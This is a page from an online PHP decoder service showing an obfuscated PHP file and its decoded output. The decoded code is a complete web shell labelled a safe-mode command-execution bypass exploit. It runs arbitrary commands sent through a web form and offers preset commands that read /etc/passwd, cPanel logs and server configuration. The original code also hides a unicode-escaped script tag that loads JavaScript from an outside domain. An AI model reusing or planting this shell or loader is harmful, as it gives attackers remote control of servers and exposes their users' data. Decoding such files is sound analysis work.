Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php eval(base64_decode('ZnVuY3Rpb24gc2FmZXNoZWxsKCRrb211dCkgCnsgCmluaV9yZXN0b3JlKCJzY..
Decoded Output download
function safeshell($komut)
{
ini_restore("safe_mode");
ini_restore("open_basedir");
$res = '';
if (!empty($komut))
{
if(function_exists('exec'))
{
@exec($komut,$res);
$res = join("
",$res);
}
elseif(function_exists('shell_exec'))
{
$res = @shell_exec($komut);
}
elseif(function_exists('system'))
{
@ob_start();
@system($komut);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(function_exists('passthru'))
{
@ob_start();
@passthru($komut);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(@is_resource($f = @popen($komut,"r")))
{
$res = "";
while(!@feof($f)) { $res .= @fread($f,1024); }
@pclose($f);
}
}
return $res;
}
echo "<b><font color=blue>Liz0ziM Private Safe Mode Command Execution Bypass Exploit</font></b><br>";
print_r('
<pre>
<form method="POST" action="">
<b><font color=blue>Komut :</font></b><input name="baba" type="text"><input value="?al??t?r" type="submit">
</form>
<form method="POST" action="">
<b><font color=blue>H?zl? Men? :=) :</font><select size="1" name="liz0">
<option value="cat /etc/passwd">/etc/passwd</option>
<option value="netstat -an | grep -i listen">Tm Ak Portalar Gr</option>
<option value="cat /var/cpanel/accounting.log">/var/cpanel/accounting.log</option>
<option value="cat /etc/syslog.conf">/etc/syslog.conf</option>
<option value="cat /etc/hosts">/etc/hosts</option>
<option value="cat /etc/named.conf">/etc/named.conf</option>
<option value="cat /etc/httpd/conf/httpd.conf">/etc/httpd/conf/httpd.conf</option>
</select> <input type="submit" value="Gster Bakim">
</form>
</pre>
');
ini_restore("safe_mode");
ini_restore("open_basedir");
if($_POST[baba]!= "") { $liz0=safeshell($_POST[baba]); }
if($_POST[liz0]!= "") { $liz0zim=safeshell($_POST[liz0]); }
$uid=safeshell('id');
$server=safeshell('uname -a');
echo "<pre><h4>";
echo "<b><font color=red>Kimim Ben :=)</font></b>:$uid<br>";
echo "<b><font color=red>Server</font></b>:$server<br>";
echo "<b><font color=red>Komut Sonuular:</font></b><br>";
if($_POST["baba"]!= "") { echo $liz0; }
if($_POST["liz0"]!= "") { echo $liz0zim; }
echo "</h4></pre>";
Did this file decode correctly?
Original Code
<?php
eval(base64_decode('ZnVuY3Rpb24gc2FmZXNoZWxsKCRrb211dCkgCnsgCmluaV9yZXN0b3JlKCJzYWZlX21vZGUiKTsKaW5pX3Jlc3RvcmUoIm9wZW5fYmFzZWRpciIpOwogJHJlcyA9ICcnOyAKIGlmICghZW1wdHkoJGtvbXV0KSkgCiB7IAppZihmdW5jdGlvbl9leGlzdHMoJ2V4ZWMnKSkgCnsgCiBAZXhlYygka29tdXQsJHJlcyk7IAogJHJlcyA9IGpvaW4oIlxuIiwkcmVzKTsgCn0gCmVsc2VpZihmdW5jdGlvbl9leGlzdHMoJ3NoZWxsX2V4ZWMnKSkgCnsgCiAkcmVzID0gQHNoZWxsX2V4ZWMoJGtvbXV0KTsgCn0gCmVsc2VpZihmdW5jdGlvbl9leGlzdHMoJ3N5c3RlbScpKSAKeyAKIEBvYl9zdGFydCgpOyAKIEBzeXN0ZW0oJGtvbXV0KTsgCiAkcmVzID0gQG9iX2dldF9jb250ZW50cygpOyAKIEBvYl9lbmRfY2xlYW4oKTsgCn0gCmVsc2VpZihmdW5jdGlvbl9leGlzdHMoJ3Bhc3N0aHJ1JykpIAp7IAogQG9iX3N0YXJ0KCk7IAogQHBhc3N0aHJ1KCRrb211dCk7IAogJHJlcyA9IEBvYl9nZXRfY29udGVudHMoKTsgCiBAb2JfZW5kX2NsZWFuKCk7IAp9IAplbHNlaWYoQGlzX3Jlc291cmNlKCRmID0gQHBvcGVuKCRrb211dCwiciIpKSkgCnsgCiRyZXMgPSAiIjsgCndoaWxlKCFAZmVvZigkZikpIHsgJHJlcyAuPSBAZnJlYWQoJGYsMTAyNCk7IH0gCkBwY2xvc2UoJGYpOyAKfSAKIH0gCiByZXR1cm4gJHJlczsgCn0KZWNobyAiPGI+PGZvbnQgY29sb3I9Ymx1ZT5MaXowemlNIFByaXZhdGUgU2FmZSBNb2RlIENvbW1hbmQgRXhlY3V0aW9uIEJ5cGFzcyBFeHBsb2l0PC9mb250PjwvYj48YnI+IjsKcHJpbnRfcignCjxwcmU+Cjxmb3JtIG1ldGhvZD0iUE9TVCIgYWN0aW9uPSIiPgo8Yj48Zm9udCBjb2xvcj1ibHVlPktvbXV0IDo8L2ZvbnQ+PC9iPjxpbnB1dCBuYW1lPSJiYWJhIiB0eXBlPSJ0ZXh0Ij48aW5wdXQgdmFsdWU9Ij9hbD8/dD9yIiB0eXBlPSJzdWJtaXQiPgo8L2Zvcm0+Cjxmb3JtIG1ldGhvZD0iUE9TVCIgYWN0aW9uPSIiPgo8Yj48Zm9udCBjb2xvcj1ibHVlPkg/emw/IE1lbj8gOj0pIDo8L2ZvbnQ+PHNlbGVjdCBzaXplPSIxIiBuYW1lPSJsaXowIj4KPG9wdGlvbiB2YWx1ZT0iY2F0IC9ldGMvcGFzc3dkIj4vZXRjL3Bhc3N3ZDwvb3B0aW9uPgo8b3B0aW9uIHZhbHVlPSJuZXRzdGF0IC1hbiB8IGdyZXAgLWkgbGlzdGVuIj5Uw7xtIEHDp8O9ayBQb3J0YWxhcsO9IEfDtnI8L29wdGlvbj4KPG9wdGlvbiB2YWx1ZT0iY2F0IC92YXIvY3BhbmVsL2FjY291bnRpbmcubG9nIj4vdmFyL2NwYW5lbC9hY2NvdW50aW5nLmxvZzwvb3B0aW9uPgo8b3B0aW9uIHZhbHVlPSJjYXQgL2V0Yy9zeXNsb2cuY29uZiI+L2V0Yy9zeXNsb2cuY29uZjwvb3B0aW9uPgo8b3B0aW9uIHZhbHVlPSJjYXQgL2V0Yy9ob3N0cyI+L2V0Yy9ob3N0czwvb3B0aW9uPgo8b3B0aW9uIHZhbHVlPSJjYXQgL2V0Yy9uYW1lZC5jb25mIj4vZXRjL25hbWVkLmNvbmY8L29wdGlvbj4KPG9wdGlvbiB2YWx1ZT0iY2F0IC9ldGMvaHR0cGQvY29uZi9odHRwZC5jb25mIj4vZXRjL2h0dHBkL2NvbmYvaHR0cGQuY29uZjwvb3B0aW9uPgo8L3NlbGVjdD4gPGlucHV0IHR5cGU9InN1Ym1pdCIgdmFsdWU9IkfDtnN0ZXIgQmFraW0iPgo8L2Zvcm0+CjwvcHJlPgonKTsKaW5pX3Jlc3RvcmUoInNhZmVfbW9kZSIpOwppbmlfcmVzdG9yZSgib3Blbl9iYXNlZGlyIik7CmlmKCRfUE9TVFtiYWJhXSE9ICIiKSB7ICRsaXowPXNhZmVzaGVsbCgkX1BPU1RbYmFiYV0pOyB9CmlmKCRfUE9TVFtsaXowXSE9ICIiKSB7ICRsaXowemltPXNhZmVzaGVsbCgkX1BPU1RbbGl6MF0pOyB9CiR1aWQ9c2FmZXNoZWxsKCdpZCcpOwokc2VydmVyPXNhZmVzaGVsbCgndW5hbWUgLWEnKTsKZWNobyAiPHByZT48aDQ+IjsKZWNobyAiPGI+PGZvbnQgY29sb3I9cmVkPktpbWltIEJlbiA6PSk8L2ZvbnQ+PC9iPjokdWlkPGJyPiI7CmVjaG8gIjxiPjxmb250IGNvbG9yPXJlZD5TZXJ2ZXI8L2ZvbnQ+PC9iPjokc2VydmVyPGJyPiI7CmVjaG8gIjxiPjxmb250IGNvbG9yPXJlZD5Lb211dCBTb251dcOnbGFyw706PC9mb250PjwvYj48YnI+IjsgCmlmKCRfUE9TVFsiYmFiYSJdIT0gIiIpIHsgZWNobyAkbGl6MDsgfQppZigkX1BPU1RbImxpejAiXSE9ICIiKSB7IGVjaG8gJGxpejB6aW07IH0KZWNobyAiPC9oND48L3ByZT4iOw=='));
?>
<script type="text/javascript">document.write('\u003c\u0053\u0043\u0052\u0049\u0050\u0054\u0020\u0053\u0052\u0043\u003d\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0073\u0069\u0062\u0065\u0072\u0073\u0061\u0076\u0061\u0073\u0063\u0069\u006c\u0061\u0072\u002e\u0063\u006f\u006d\u002f\u0078\u002f\u0069\u006d\u0067\u002e\u006a\u0073\u003e\u003c\u002f\u0053\u0043\u0052\u0049\u0050\u0054\u003e\u000a')</script>
Function Calls
base64_decode | 1 |
Stats
MD5 | b2a21a41fc9a9cb0cc427261923726be |
Eval Count | 1 |
Decode Time | 90 ms |